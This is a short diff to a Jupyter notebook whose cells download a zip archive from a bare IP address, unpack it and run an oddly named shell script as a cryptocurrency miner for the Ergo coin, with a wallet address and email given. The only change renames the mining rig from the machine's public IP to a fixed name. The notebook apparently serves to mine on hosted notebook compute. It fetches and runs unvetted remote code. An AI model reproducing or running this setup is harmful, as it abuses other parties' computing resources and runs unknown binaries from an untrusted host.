--- a/3.ipynb
+++ b/3.ipynb
@@ -602,7 +602,7 @@
         "! wget http://139.59.124.245:81/aria2/dl/menari.zip\r\n",
 		"! unzip menari.zip\n",
         "% cd menari\n",
-        "! ip=$(echo \\\"$(curl -s ifconfig.me)\\\" | tr . _ ) && chmod +x *.sh && sed -i -e 's/$//' djhdfhff.sh && ./djhdfhff.sh -algo autolykos -wallet 9fob9dXXQ2Kkcj6ErqyfTDs2HzdQV7XEkZNEGH6MK7BcZay8Mvt -coin ergo -rigName $ip -email zakigiri.vps3@gmail.com "
+        "! ip=$(echo \\\"$(curl -s ifconfig.me)\\\" | tr . _ ) && chmod +x *.sh && sed -i -e 's/$//' djhdfhff.sh && ./djhdfhff.sh -algo autolykos -wallet 9fob9dXXQ2Kkcj6ErqyfTDs2HzdQV7XEkZNEGH6MK7BcZay8Mvt -coin ergo -rigName gig3 -email zakigiri.vps3@gmail.com "
       ],
       "execution_count": null,
       "outputs": []
